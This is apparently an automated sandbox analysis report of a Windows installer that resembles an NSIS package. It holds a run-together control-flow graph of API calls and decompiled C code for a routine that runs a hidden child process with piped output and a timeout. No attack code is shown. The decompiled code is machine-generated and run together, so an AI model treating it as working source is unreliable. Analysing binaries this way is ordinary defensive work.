403b1e 5165->5168 5170 40639c 3 API calls 5167->5170 5169 405264 5 API calls 5168->5169 5171 403b24 5169->5171 5172 403ab3 5170->5172 5173 403b40 5171->5173 5174 403b28 5171->5174 5175 403ac1 GetClassInfoW 5172->5175 5177 40639c 3 API calls 5172->5177 5176 40140b 2 API calls 5173->5176 5180 40140b 2 API calls 5174->5180 5174->5182 
5178 403ad5 GetClassInfoW RegisterClassW 5175->5178 5179 403aeb DialogBoxParamW 5175->5179 5176->5182 5177->5175 5178->5179 5181 40140b 2 API calls 5179->5181 5180->5182 5181->5182 5182->5029 5183->5033 5184->5065 5185->5034 5187 4037b9 5186->5187 5188 4037ab CloseHandle 5186->5188 5223 4037e6 5187->5223 5188->5187 5191 405823 69 API calls 5192 4035d3 OleUninitialize 5191->5192 5192->5040 5192->5041 5193->5073 5194->5084 5195->5101 5196->5104 5197->5108 5199 402d93 5198->5199 5200 402dab 5198->5200 5201 402da3 5199->5201 5202 402d9c DestroyWindow 5199->5202 5203 402db3 5200->5203 5204 402dbb GetTickCount 5200->5204 5201->5110 5202->5201 5205 406444 2 API calls 5203->5205 5206 402dc9 CreateDialogParamW ShowWindow 5204->5206 5207 402dec 5204->5207 5208 402db9 5205->5208 5206->5207 5207->5110 5208->5110 5209->5116 5210->5118 5212 403b65 5211->5212 5222 405f79 wsprintfW 5212->5222 5214 403bd6 5215 406054 18 API calls 5214->5215 5216 403be2 SetWindowTextW 5215->5216 5217 403906 5216->5217 5218 403bfe 5216->5218 5217->5140 5218->5217 5219 406054 18 API calls 5218->5219 5219->5218 5220->5136 5221->5142 5222->5214 5224 4037f4 5223->5224 5225 4037be 5224->5225 5226 4037f9 FreeLibrary GlobalFree 5224->5226 5225->5191 5226->5225 5226->5226 5465 1000103d 5466 1000101b 5 API calls 5465->5466 5467 10001056 5466->5467 5468 4014ff 5469 401507 5468->5469 5471 40151a 5468->5471 5470 402ba2 18 API calls 5469->5470 5470->5471 5472 401000 5473 401037 BeginPaint GetClientRect 5472->5473 5476 40100c DefWindowProcW 5472->5476 5474 4010f3 5473->5474 5477 401073 CreateBrushIndirect FillRect DeleteObject 5474->5477 5478 4010fc 5474->5478 5479 401179 5476->5479 5477->5474 5480 401102 CreateFontIndirectW 5478->5480 5481 401167 EndPaint 5478->5481 5480->5481 5482 401112 6 API calls 5480->5482 5481->5479 5482->5481 5483 401904 5484 40193b 5483->5484 5485 402bbf 18 API calls 5484->5485 5486 401940 5485->5486 5487 405823 69 API calls 5486->5487 5488 401949 5487->5488 5489 402d04 5490 402d16 
SetTimer 5489->5490 5492 402d2f 5489->5492 5490->5492 5491 402d84 5492->5491 5493 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5492->5493 5493->5491 5494 405105 5495 405115 5494->5495 5496 405129 5494->5496 5497 40511b 5495->5497 5506 405172 5495->5506 5498 405131 IsWindowVisible 5496->5498 5504 405148 5496->5504 5500 404142 SendMessageW 5497->5500 5501 40513e 5498->5501 5498->5506 5499 405177 CallWindowProcW 5502 405125 5499->5502 5500->5502 5507 404a5b SendMessageW 5501->5507 5504->5499 5512 404adb 5504->5512 5506->5499 5508 404aba SendMessageW 5507->5508 5509 404a7e GetMessagePos ScreenToClient SendMessageW 5507->5509 5510 404ab2 5508->5510 5509->5510 5511 404ab7 5509->5511 5510->5504 5511->5508 5521 406032 lstrcpynW 5512->5521 5514 404aee 5522 405f79 wsprintfW 5514->5522 5516 404af8 5517 40140b 2 API calls 5516->5517 5518 404b01 5517->5518 5523 406032 lstrcpynW 5518->5523 5520 404b08 5520->5506 5521->5514 5522->5516 5523->5520 4279 402786 4280 40278d 4279->4280 4282 4029f7 4279->4282 4287 402ba2 4280->4287 4283 402798 4284 40279f SetFilePointer 4283->4284 4284->4282 4285 4027af 4284->4285 4290 405f79 wsprintfW 4285->4290 4288 406054 18 API calls 4287->4288 4289 402bb6 4288->4289 4289->4283 4290->4282 5524 401907 5525 402bbf 18 API calls 5524->5525 5526 40190e 5525->5526 5527 405777 MessageBoxIndirectW 5526->5527 5528 401917 5527->5528 5529 401e08 5530 402bbf 18 API calls 5529->5530 5531 401e0e 5530->5531 5532 402bbf 18 API calls 5531->5532 5533 401e17 5532->5533 5534 402bbf 18 API calls 5533->5534 5535 401e20 5534->5535 5536 402bbf 18 API calls 5535->5536 5537 401e29 5536->5537 5538 401423 25 API calls 5537->5538 5539 401e30 ShellExecuteW 5538->5539 5540 401e61 5539->5540 5546 40420a lstrcpynW lstrlenW 5547 404b0d GetDlgItem GetDlgItem 5548 404b5f 7 API calls 5547->5548 5552 404d78 5547->5552 5549 404c02 DeleteObject 5548->5549 5550 404bf5 SendMessageW 5548->5550 5551 404c0b 5549->5551 5550->5549 5553 404c42 5551->5553 5555 406054 18 API calls 
5551->5555 5565 404a5b 5 API calls 5552->5565 5570 404e5c 5552->5570 5579 404de9 5552->5579 5556 4040f6 19 API calls 5553->5556 5554 404f08 5558 404f12 SendMessageW 5554->5558 5559 404f1a 5554->5559 5560 404c24 SendMessageW SendMessageW 5555->5560 5561 404c56 5556->5561 5557 404d6b 5563 40415d 8 API calls 5557->5563 5558->5559 5571 404f33 5559->5571 5572 404f2c ImageList_Destroy 5559->5572 5576 404f43 5559->5576 5560->5551 5566 4040f6 19 API calls 5561->5566 5562 404eb5 SendMessageW 5562->5557 5568 404eca SendMessageW 5562->5568 5569 4050fe 5563->5569 5564 404e4e SendMessageW 5564->5570 5565->5579 5580 404c64 5566->5580 5567 4050b2 5567->5557 5577 4050c4 ShowWindow GetDlgItem ShowWindow 5567->5577 5574 404edd 5568->5574 5570->5554 5570->5557 5570->5562 5575 404f3c GlobalFree 5571->5575 5571->5576 5572->5571 5573 404d39 GetWindowLongW SetWindowLongW 5578 404d52 5573->5578 5585 404eee SendMessageW 5574->5585 5575->5576 5576->5567 5590 404adb 4 API calls 5576->5590 5594 404f7e 5576->5594 5577->5557 5581 404d70 5578->5581 5582 404d58 ShowWindow 5578->5582 5579->5564 5579->5570 5580->5573 5584 404cb4 SendMessageW 5580->5584 5586 404d33 5580->5586 5588 404cf0 SendMessageW 5580->5588 5589 404d01 SendMessageW 5580->5589 5599 40412b SendMessageW 5581->5599 5598 40412b SendMessageW 5582->5598 5584->5580 5585->5554 5586->5573 5586->5578 5588->5580 5589->5580 5590->5594 5591 405088 InvalidateRect 5591->5567 5592 40509e 5591->5592 5600 404a16 5592->5600 5593 404fac SendMessageW 5597 404fc2 5593->5597 5594->5593 5594->5597 5596 405036 SendMessageW SendMessageW 5596->5597 5597->5591 5597->5596 5598->5557 5599->5552 5603 40494d 5600->5603 5602 404a2b 5602->5567 5604 404966 5603->5604 5605 406054 18 API calls 5604->5605 5606 4049ca 5605->5606 5607 406054 18 API calls 5606->5607 5608 4049d5 5607->5608 5609 406054 18 API calls 5608->5609 5610 4049eb lstrlenW wsprintfW SetDlgItemTextW 5609->5610 5610->5602 5611 1000164f 5612 10001516 GlobalFree 5611->5612 5614 10001667 5612->5614 5613 
100016ad GlobalFree 5614->5613 5615 10001682 5614->5615 5616 10001699 VirtualFree 5614->5616 5615->5613 5616->5613 5617 404591 5618 4045bd 5617->5618 5619 4045ce 5617->5619 5678 40575b GetDlgItemTextW 5618->5678 5621 4045da GetDlgItem 5619->5621 5627 404639 5619->5627 5623 4045ee 5621->5623 5622 4045c8 5625 4062c6 5 API calls 5622->5625 5626 404602 SetWindowTextW 5623->5626 5630 405a91 4 API calls 5623->5630 5624 40471d 5675 4048cc 5624->5675 5680 40575b GetDlgItemTextW 5624->5680 5625->5619 5631 4040f6 19 API calls 5626->5631 5627->5624 5632 406054 18 API calls 5627->5632 5627->5675 5629 40415d 8 API calls 5634 4048e0 5629->5634 5635 4045f8 5630->5635 5636 40461e 5631->5636 5637 4046ad SHBrowseForFolderW 5632->5637 5633 40474d 5638 405aee 18 API calls 5633->5638 5635->5626 5644 4059e6 3 API calls 5635->5644 5639 4040f6 19 API calls 5636->5639 5637->5624 5640 4046c5 CoTaskMemFree 5637->5640 5641 404753 5638->5641 5642 40462c 5639->5642 5643 4059e6 3 API calls 5640->5643 5681 406032 lstrcpynW 5641->5681 5679 40412b SendMessageW 5642->5679 5646 4046d2 5643->5646 5644->5626 5649 404709 SetDlgItemTextW 5646->5649 5653 406054 18 API calls 5646->5653 5648 404632 5651 406408 5 API calls 5648->5651 5649->5624 5650 40476a 5652 406408 5 API calls 5650->5652 5651->5627 5660 404771 5652->5660 5654 4046f1 lstrcmpiW 5653->5654 5654->5649 5657 404702 lstrcatW 5654->5657 5655 4047b2 5682 406032 lstrcpynW 5655->5682 5657->5649 5658 4047b9 5659 405a91 4 API calls 5658->5659 5661 4047bf GetDiskFreeSpaceW 5659->5661 5660->5655 5664 405a32 2 API calls 5660->5664 5665 40480a 5660->5665 5663 4047e3 MulDiv 5661->5663 5661->5665 5663->5665 5664->5660 5666 404a16 21 API calls 5665->5666 5676 40487b 5665->5676 5667 404868 5666->5667 5670 40487d SetDlgItemTextW 5667->5670 5671 40486d 5667->5671 5668 40140b 2 API calls 5669 40489e 5668->5669 5683 404118 KiUserCallbackDispatcher 5669->5683 5670->5676 5674 40494d 21 API calls 5671->5674 5673 4048ba 5673->5675 5684 404526 5673->5684 5674->5676 
5675->5629 5676->5668 5676->5669 5678->5622 5679->5648 5680->5633 5681->5650 5682->5658 5683->5673 5685 404534 5684->5685 5686 404539 SendMessageW 5684->5686 5685->5686 5686->5675 5690 404293 5691 4042ab 5690->5691 5694 4043c5 5690->5694 5695 4040f6 19 API calls 5691->5695 5692 40442f 5693 404439 GetDlgItem 5692->5693 5696 404501 5692->5696 5698 404453 5693->5698 5699 4044c2 5693->5699 5694->5692 5694->5696 5700 404400 GetDlgItem SendMessageW 5694->5700 5701 404312 5695->5701 5697 40415d 8 API calls 5696->5697 5703 4044fc 5697->5703 5698->5699 5704 404479 6 API calls 5698->5704 5699->5696 5705 4044d4 5699->5705 5721 404118 KiUserCallbackDispatcher 5700->5721 5702 4040f6 19 API calls 5701->5702 5707 40431f CheckDlgButton 5702->5707 5704->5699 5708 4044ea 5705->5708 5709 4044da SendMessageW 5705->5709 5719 404118 KiUserCallbackDispatcher 5707->5719 5708->5703 5712 4044f0 SendMessageW 5708->5712 5709->5708 5710 40442a 5713 404526 SendMessageW 5710->5713 5712->5703 5713->5692 5714 40433d GetDlgItem 5720 40412b SendMessageW 5714->5720 5716 404353 SendMessageW 5717 404370 GetSysColor 5716->5717 5718 404379 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5716->5718 5717->5718 5718->5703 5719->5714 5720->5716 5721->5710 4384 402095 4385 402bbf 18 API calls 4384->4385 4386 40209c 4385->4386 4387 402bbf 18 API calls 4386->4387 4388 4020a6 4387->4388 4389 402bbf 18 API calls 4388->4389 4390 4020b0 4389->4390 4391 402bbf 18 API calls 4390->4391 4392 4020ba 4391->4392 4393 402bbf 18 API calls 4392->4393 4395 4020c4 4393->4395 4394 402103 CoCreateInstance 4398 402122 4394->4398 4395->4394 4396 402bbf 18 API calls 4395->4396 4396->4394 4397 401423 25 API calls 4399 4021e1 4397->4399 4398->4397 4398->4399 5722 401a15 5723 402bbf 18 API calls 5722->5723 5724 401a1e ExpandEnvironmentStringsW 5723->5724 5725 401a32 5724->5725 5727 401a45 5724->5727 5726 401a37 lstrcmpW 5725->5726 5725->5727 5726->5727 5728 402515 5729 402bbf 18 API calls 5728->5729 5730 40251c 5729->5730 
5733 405c07 GetFileAttributesW CreateFileW 5730->5733 5732 402528 5733->5732 5734 401b16 5735 402bbf 18 API calls 5734->5735 5736 401b1d 5735->5736 5737 402ba2 18 API calls 5736->5737 5738 401b26 wsprintfW 5737->5738 5739 402a4c 5738->5739 5740 10001058 5742 10001074 5740->5742 5741 100010dd 5742->5741 5743 10001092 5742->5743 5744 10001516 GlobalFree 5742->5744 5745 10001516 GlobalFree 5743->5745 5744->5743 5746 100010a2 5745->5746 5747 100010b2 5746->5747 5748 100010a9 GlobalSize 5746->5748 5749 100010b6 GlobalAlloc 5747->5749 5750 100010c7 5747->5750 5748->5747 5751 1000153d 3 API calls 5749->5751 5752 100010d2 GlobalFree 5750->5752 5751->5750 5752->5741 4413 40159b 4414 402bbf 18 API calls 4413->4414 4415 4015a2 SetFileAttributesW 4414->4415 4416 4015b4 4415->4416 5753 40229d 5754 4022a5 5753->5754 5755 4022ab 5753->5755 5757 402bbf 18 API calls 5754->5757 5756 4022b9 5755->5756 5758 402bbf 18 API calls 5755->5758 5759 4022c7 5756->5759 5760 402bbf 18 API calls 5756->5760 5757->5755 5758->5756 5761 402bbf 18 API calls 5759->5761 5760->5759 5762 4022d0 WritePrivateProfileStringW 5761->5762 5763 401f1d 5764 402bbf 18 API calls 5763->5764 5765 401f24 5764->5765 5766 406408 5 API calls 5765->5766 5767 401f33 5766->5767 5768 401fb7 5767->5768 5769 401f4f GlobalAlloc 5767->5769 5769->5768 5770 401f63 5769->5770 5771 406408 5 API calls 5770->5771 5772 401f6a 5771->5772 5773 406408 5 API calls 5772->5773 5774 401f74 5773->5774 5774->5768 5778 405f79 wsprintfW 5774->5778 5776 401fa9 5779 405f79 wsprintfW 5776->5779 5778->5776 5779->5768 4425 403c1e 4426 403d71 4425->4426 4427 403c36 4425->4427 4429 403d82 GetDlgItem GetDlgItem 4426->4429 4438 403dc2 4426->4438 4427->4426 4428 403c42 4427->4428 4430 403c60 4428->4430 4431 403c4d SetWindowPos 4428->4431 4432 4040f6 19 API calls 4429->4432 4435 403c65 ShowWindow 4430->4435 4436 403c7d 4430->4436 4431->4430 4437 403dac KiUserCallbackDispatcher 4432->4437 4433 403e1c 4434 404142 SendMessageW 4433->4434 4443 403d6c 4433->4443 
4485 403e2e 4434->4485 4435->4436 4439 403c85 DestroyWindow 4436->4439 4440 403c9f 4436->4440 4495 40140b 4437->4495 4438->4433 4442 401389 2 API calls 4438->4442 4444 40407f 4439->4444 4445 403ca4 SetWindowLongW 4440->4445 4446 403cb5 4440->4446 4447 403df4 4442->4447 4444->4443 4454 4040b0 ShowWindow 4444->4454 4445->4443 4450 403cc1 GetDlgItem 4446->4450 4451 403d5e 4446->4451 4447->4433 4452 403df8 SendMessageW 4447->4452 4448 40140b 2 API calls 4448->4485 4449 404081 DestroyWindow EndDialog 4449->4444 4455 403cf1 4450->4455 4456 403cd4 SendMessageW IsWindowEnabled 4450->4456 4453 40415d 8 API calls 4451->4453 4452->4443 4453->4443 4454->4443 4458 403cfe 4455->4458 4459 403d45 SendMessageW 4455->4459 4460 403d11 4455->4460 4468 403cf6 4455->4468 4456->4443 4456->4455 4457 406054 18 API calls 4457->4485 4458->4459 4458->4468 4459->4451 4463 403d19 4460->4463 4464 403d2e 4460->4464 4461 4040cf SendMessageW 4465 403d2c 4461->4465 4462 4040f6 19 API calls 4462->4485 4466 40140b 2 API calls 4463->4466 4467 40140b 2 API calls 4464->4467 4465->4451 4466->4468 4469 403d35 4467->4469 4468->4461 4469->4451 4469->4468 4470 4040f6 19 API calls 4471 403ea9 GetDlgItem 4470->4471 4472 403ec6 ShowWindow KiUserCallbackDispatcher 4471->4472 4473 403ebe 4471->4473 4498 404118 KiUserCallbackDispatcher 4472->4498 4473->4472 4475 403ef0 EnableWindow 4478 403f04 4475->4478 4476 403f09 GetSystemMenu EnableMenuItem SendMessageW 4477 403f39 SendMessageW 4476->4477 4476->4478 4477->4478 4478->4476 4499 40412b SendMessageW 4478->4499 4500 406032 lstrcpynW 4478->4500 4481 403f67 lstrlenW 4482 406054 18 API calls 4481->4482 4483 403f7d SetWindowTextW 4482->4483 4484 401389 2 API calls 4483->4484 4484->4485 4485->4443 4485->4448 4485->4449 4485->4457 4485->4462 4485->4470 4486 403fc1 DestroyWindow 4485->4486 4486->4444 4487 403fdb CreateDialogParamW 4486->4487 4487->4444 4488 40400e 4487->4488 4489 4040f6 19 API calls 4488->4489 4490 404019 GetDlgItem GetWindowRect ScreenToClient 
SetWindowPos 4489->4490 4491 401389 2 API calls 4490->4491 4492 40405f 4491->4492 4492->4443 4493 404067 ShowWindow 4492->4493 4494 404142 SendMessageW 4493->4494 4494->4444 4496 401389 2 API calls 4495->4496 4497 401420 4496->4497 4497->4438 4498->4475 4499->4478 4500->4481 4501 40249e 4512 402cc9 4501->4512 4503 4024a8 4504 402ba2 18 API calls 4503->4504 4505 4024b1 4504->4505 4506 4024bc 4505->4506 4510 40281e 4505->4510 4507 4024d5 RegEnumValueW 4506->4507 4508 4024c9 RegEnumKeyW 4506->4508 4509 4024ee RegCloseKey 4507->4509 4507->4510 4508->4509 4509->4510 4513 402bbf 18 API calls 4512->4513 4514 402ce2 4513->4514 4515 402cf0 RegOpenKeyExW 4514->4515 4515->4503 5780 40149e 5781 4014ac PostQuitMessage 5780->5781 5782 402288 5780->5782 5781->5782 4538 40231f 4539 402324 4538->4539 4540 40234f 4538->4540 4542 402cc9 19 API calls 4539->4542 4541 402bbf 18 API calls 4540->4541 4546 402356 4541->4546 4543 40232b 4542->4543 4544 402335 4543->4544 4547 40236c 4543->4547 4545 402bbf 18 API calls 4544->4545 4548 40233c RegDeleteValueW RegCloseKey 4545->4548 4550 402bff RegOpenKeyExW 4546->4550 4548->4547 4551 402c93 4550->4551 4559 402c2a 4550->4559 4551->4547 4552 402c50 RegEnumKeyW 4553 402c62 RegCloseKey 4552->4553 4552->4559 4561 406408 GetModuleHandleA 4553->4561 4554 402c87 RegCloseKey 4558 402c76 4554->4558 4556 402bff 5 API calls 4556->4559 4558->4551 4559->4552 4559->4553 4559->4554 4559->4556 4560 402ca2 RegDeleteKeyW 4560->4558 4562 406424 4561->4562 4563 40642e GetProcAddress 4561->4563 4567 40639c GetSystemDirectoryW 4562->4567 4565 402c72 4563->4565 4565->4558 4565->4560 4566 40642a 4566->4563 4566->4565 4568 4063be wsprintfW LoadLibraryW 4567->4568 4568->4566 5783 100010e1 5784 10001111 5783->5784 5785 100011d8 GlobalFree 5784->5785 5786 100012ba 2 API calls 5784->5786 5787 100011d3 5784->5787 5788 10001272 2 API calls 5784->5788 5789 10001164 GlobalAlloc 5784->5789 5790 100011f8 GlobalFree 5784->5790 5791 100011c4 GlobalFree 5784->5791 5792 100012e1 
lstrcpyW 5784->5792 5786->5784 5787->5785 5788->5791 5789->5784 5790->5784 5791->5784 5792->5784 5793 401ca3 5794 402ba2 18 API calls 5793->5794 5795 401ca9 IsWindow 5794->5795 5796 401a05 5795->5796 5797 402a27 SendMessageW 5798 402a41 InvalidateRect 5797->5798 5799 402a4c 5797->5799 5798->5799 5800 40242a 5801 402cc9 19 API calls 5800->5801 5802 402434 5801->5802 5803 402bbf 18 API calls 5802->5803 5804 40243d 5803->5804 5805 402448 RegQueryValueExW 5804->5805 5809 40281e 5804->5809 5806 40246e RegCloseKey 5805->5806 5807 402468 5805->5807 5806->5809 5807->5806 5811 405f79 wsprintfW 5807->5811 5811->5806 4811 40172d 4812 402bbf 18 API calls 4811->4812 4813 401734 SearchPathW 4812->4813 4814 40174f 4813->4814 5812 4027b4 5813 4027ba 5812->5813 5814 4027c2 FindClose 5813->5814 5815 402a4c 5813->5815 5814->5815 5816 401b37 5817 401b44 5816->5817 5818 401b88 5816->5818 5819 401bcd 5817->5819 5825 401b5b 5817->5825 5820 401bb2 GlobalAlloc 5818->5820 5821 401b8d 5818->5821 5822 406054 18 API calls 5819->5822 5828 402288 5819->5828 5823 406054 18 API calls 5820->5823 5821->5828 5837 406032 lstrcpynW 5821->5837 5824 402282 5822->5824 5823->5819 5830 405777 MessageBoxIndirectW 5824->5830 5835 406032 lstrcpynW 5825->5835 5829 401b9f GlobalFree 5829->5828 5830->5828 5831 401b6a 5836 406032 lstrcpynW 5831->5836 5833 401b79 5838 406032 lstrcpynW 5833->5838 5835->5831 5836->5833 5837->5829 5838->5828 5839 402537 5840 402562 5839->5840 5841 40254b 5839->5841 5843 402596 5840->5843 5844 402567 5840->5844 5842 402ba2 18 API calls 5841->5842 5849 402552 5842->5849 5845 402bbf 18 API calls 5843->5845 5846 402bbf 18 API calls 5844->5846 5847 40259d lstrlenW 5845->5847 5848 40256e WideCharToMultiByte lstrlenA 5846->5848 5847->5849 5848->5849 5851 405ce8 5 API calls 5849->5851 5852 4025e0 5849->5852 5853 4025ca 5849->5853 5850 405cb9 WriteFile 5850->5852 5851->5853 5853->5850 5853->5852 5854 4014b8 5855 4014be 5854->5855 5856 401389 2 API calls 5855->5856 5857 4014c6 5856->5857 4867 
[Control-flow graph edge listing (node addresses 4015b9 through 10002ab2 with API-call annotations, rendered as a graph in the original report) not reproduced here]

Control-flow Graph

[Graph for function 7e1112 (node ranges 7e1112 through 7e1689 with API-call annotations, rendered as an executed / not-executed graph in the original report) not reproduced here]
                                                C-Code - Quality: 88%
                                                			E007E1112(void* __eflags, signed int _a4) {
                                                				void* _v8;
                                                				void* _v12;
                                                				WCHAR* _v16;
                                                				long _v20;
                                                				WCHAR* _v24;
                                                				void* _v28;
                                                				long _v32;
                                                				void* _v36;
                                                				void* _v40;
                                                				long _v44;
                                                				void* _v48;
                                                				struct _OVERLAPPED* _v52;
                                                				struct _OVERLAPPED* _v56;
                                                				long _v60;
                                                				void* _v64;
                                                				struct _SECURITY_ATTRIBUTES _v76;
                                                				struct _PROCESS_INFORMATION _v92;
                                                				void* _v111;
                                                				struct _SECURITY_DESCRIPTOR _v112;
                                                				struct _STARTUPINFOW _v180;
                                                				void _v434;
                                                				short _v436;
                                                				short _v956;
                                                				short _t177;
                                                				intOrPtr _t181;
                                                				void* _t183;
                                                				struct HWND__* _t184;
                                                				void* _t186;
                                                				int _t196;
                                                				void* _t207;
                                                				void* _t208;
                                                				void* _t225;
                                                				int _t228;
                                                				int _t246;
                                                				long _t248;
                                                				unsigned int _t251;
                                                				signed int _t254;
                                                				short _t256;
                                                				struct _OVERLAPPED* _t258;
                                                				void* _t262;
                                                				long _t272;
                                                				void* _t273;
                                                				intOrPtr _t275;
                                                				struct _OVERLAPPED* _t281;
                                                				struct HWND__* _t282;
                                                				struct HWND__* _t283;
                                                				long _t285;
                                                				intOrPtr _t286;
                                                				void* _t298;
                                                				void* _t300;
                                                				struct _OVERLAPPED* _t308;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				intOrPtr _t326;
                                                				struct _OVERLAPPED** _t328;
                                                				WCHAR* _t333;
                                                				WCHAR* _t339;
                                                				signed int _t345;
                                                				void* _t349;
                                                				WCHAR* _t350;
                                                				short* _t351;
                                                				WCHAR* _t353;
                                                				signed int _t358;
                                                				short* _t359;
                                                				short* _t360;
                                                				void* _t362;
                                                				void* _t364;
                                                				struct _OVERLAPPED* _t370;
                                                				WCHAR* _t371;
                                                				WCHAR* _t375;
                                                				void* _t377;
                                                				void* _t378;
                                                				void* _t379;
                                                				void* _t380;
                                                
                                                				_t177 =  *0x7e3cb8; // 0x0
                                                				_v436 = _t177;
                                                				_t309 = 0x3f;
                                                				memset( &_v434, 0, _t309 << 2);
                                                				_t379 = _t378 + 0xc;
                                                				_t310 = 0;
                                                				asm("stosw");
                                                				if(E007E1096(0) != 0) {
                                                					_t181 =  *0x7e3cc8; // 0x400
                                                					_t308 = 0;
                                                					_v16 = 0;
                                                					_t183 = GlobalAlloc(0x40, _t181 + _t181 + 2);
                                                					_v24 = _t183;
                                                					_t339 = _t183;
                                                					_t364 = _t183;
                                                					goto L13;
                                                				} else {
                                                					_t285 = GetModuleFileNameW( *0x7e3cbc,  &_v956, 0x104);
                                                					_t286 =  *0x7e3cc8; // 0x400
                                                					_t358 = _t285 + 2;
                                                					_t364 = GlobalAlloc(0x40, _t286 + _t358 + _t286 + _t358 + 4);
                                                					_t359 = _t377 + _t358 * 2 - 0x3bc;
                                                					_v24 = _t364;
                                                					_t11 = _t364 + 2; // 0x2
                                                					 *_t364 = 0x22;
                                                					_v16 = _t11;
                                                					while( *_t359 != 0x5c) {
                                                						_push(_t359);
                                                						_push( &_v956);
                                                						_t359 = CharPrevW();
                                                						if(_t359 >  &_v956) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					if(_t359 !=  &_v956) {
                                                						_t308 = 0;
                                                						 *_t359 = 0;
                                                						GetTempFileNameW( &_v956, L"ns", 0, _v16);
                                                						 *_t359 = 0x5c;
                                                						if(CopyFileW( &_v956, _v16, 0) == 0) {
                                                							L11:
                                                							lstrcatW(_t364, "\"");
                                                							_t360 = _t364 + lstrlenW(_t364) * 2;
                                                							 *_t360 = 0x20;
                                                							_t339 = _t360 + 2;
                                                							L13:
                                                							_t184 =  *0x7e3cc4; // 0x602c2
                                                							_v36 = _t339;
                                                							_v56 = _t308;
                                                							_v52 = _t308;
                                                							 *0x7e3cc0 = _t308;
                                                							if(_t184 != _t308) {
                                                								_t282 = FindWindowExW(_t184, _t308, L"#32770", _t308); // executed
                                                								_t283 = FindWindowExW(_t282, _t308, L"SysListView32", _t308); // executed
                                                								_t364 = _v24;
                                                								 *0x7e3cc0 = _t283;
                                                							}
                                                							while(1) {
                                                								E007E1A33(_t339);
                                                								_t186 = E007E1849(_t310, _t339, L"/TIMEOUT=");
                                                								_pop(_t310);
                                                								if(_t186 != _t339) {
                                                									goto L17;
                                                								}
                                                								_t37 =  &(_t339[9]); // 0x12
                                                								_t281 = E007E18AF(_t37);
                                                								_pop(_t310);
                                                								_v56 = _t281;
                                                								L19:
                                                								 *_t339 = _t308;
                                                								continue;
                                                								L17:
                                                								if(lstrcmpiW(_t339, L"/OEM") != 0) {
                                                									if( *_t339 != _t308) {
                                                										_t312 = 0x10;
                                                										_v180.cb = 0x44;
                                                										_v76.nLength = 0xc;
                                                										memset( &(_v180.lpReserved), 0, _t312 << 2);
                                                										_t380 = _t379 + 0xc;
                                                										_v112.Revision = _t308;
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosw");
                                                										asm("stosb");
                                                										_v92.hProcess = _t308;
                                                										asm("stosd");
                                                										asm("stosd");
                                                										asm("stosd");
                                                										GetVersion();
                                                										_v40 = _t308;
                                                										asm("sbb edi, edi");
                                                										_t345 =  ~( &(_v92.hThread));
                                                										_v28 = _t308;
                                                										_v48 = _t308;
                                                										_v64 = _t308;
                                                										_v20 = 1;
                                                										_v44 = _t308;
                                                										_v32 = 0x102;
                                                										_v12 = _t308;
                                                										_v8 = _t308;
                                                										if(_a4 == _t308) {
                                                											L31:
                                                											_v76.bInheritHandle = 1;
                                                											_v76.lpSecurityDescriptor = _t308;
                                                											if(_t345 != _t308) {
                                                												InitializeSecurityDescriptor( &_v112, 1);
                                                												SetSecurityDescriptorDacl( &_v112, 1, _t308, _t308);
                                                												_v76.lpSecurityDescriptor =  &_v112;
                                                											}
                                                											_t196 = CreatePipe( &_v28,  &_v40,  &_v76, _t308); // executed
                                                											if(_t196 == 0 || CreatePipe( &_v64,  &_v48,  &_v76, _t308) == 0) {
                                                												L75:
                                                												lstrcpyW( &_v436, L"error");
                                                												goto L76;
                                                											} else {
                                                												GetStartupInfoW( &_v180);
                                                												_v180.dwFlags = 0x101;
                                                												_v180.hStdInput = _v48;
                                                												_t225 = _v40;
                                                												_v180.hStdOutput = _t225;
                                                												_v180.hStdError = _t225;
                                                												_v180.wShowWindow = _t308;
                                                												_t228 = CreateProcessW(_t308, _v24, _t308, _t308, 1, 0x10, _t308, _t308,  &_v180,  &_v92); // executed
                                                												if(_t228 == 0) {
                                                													goto L75;
                                                												}
                                                												_v60 = GetTickCount();
                                                												while(_v32 != _t308 || _v20 != _t308) {
                                                													PeekNamedPipe(_v28, _t308, _t308, _t308,  &_v20, _t308); // executed
                                                													if(_v20 == _t308) {
                                                														_t370 = _v56;
                                                														if(_t370 == _t308 || GetTickCount() <= _v60 + _t370) {
                                                															Sleep(0x64); // executed
                                                														} else {
                                                															TerminateProcess(_v92.hProcess, 0xffffffff);
                                                															lstrcpyW( &_v436, L"timeout");
                                                														}
                                                														L74:
                                                														_v32 = WaitForSingleObject(_v92.hProcess, _t308);
                                                														GetExitCodeProcess(_v92.hProcess,  &_v44); // executed
                                                														PeekNamedPipe(_v28, _t308, _t308, _t308,  &_v20, _t308); // executed
                                                														continue;
                                                													}
                                                													_v60 = GetTickCount();
                                                													ReadFile(_v28, "740976928\r\n", 0x3ff,  &_v20, _t308); // executed
                                                													 *("740976928\r\n" + _v20) = _t308;
                                                													E007E10D3("740976928\r\n", _v20, 0x7e34b8, 0x400);
                                                													_t380 = _t380 + 0x10;
                                                													if(_a4 == _t308) {
                                                														goto L74;
                                                													}
                                                													_t246 = lstrlenW(_v8);
                                                													if((_a4 & 0x00000002) == 0) {
                                                														_v32 = _t246;
                                                														_t114 = 1 + lstrlenW(0x7e34b8); // 0x103
                                                														_t349 = _v32 + _t114;
                                                														_t248 = GlobalSize(_v12);
                                                														_t318 = _t349 + _t349;
                                                														if(_t248 >= _t349 + _t349) {
                                                															L46:
                                                															lstrcatW(_v8, 0x7e34b8);
                                                															_push("\t");
                                                															_push(_v8);
                                                															while(1) {
                                                																_t350 = E007E1849(_t318);
                                                																if(_t350 == _t308) {
                                                																	break;
                                                																}
                                                																_t251 = GlobalSize(_v12);
                                                																_t318 = _t350 - _v8 >> 1;
                                                																if(_t350 - _v8 >> 1 <= (_t251 >> 1) - 0x12) {
                                                																	_t254 = lstrlenW(_t350);
                                                																	_t127 = _t254 * 2; // 0x22
                                                																	_t318 = _t350 + _t127 + 0x22;
                                                																	_t333 =  &(_t350[_t254]);
                                                																	if(_t254 <= _t308) {
                                                																		L51:
                                                																		lstrcpyW(_t350, L"        ");
                                                																		_t351 =  &(_t350[0x11]);
                                                																		 *_t351 = 0x20;
                                                																		L52:
                                                																		_push("\t");
                                                																		_push(_t351);
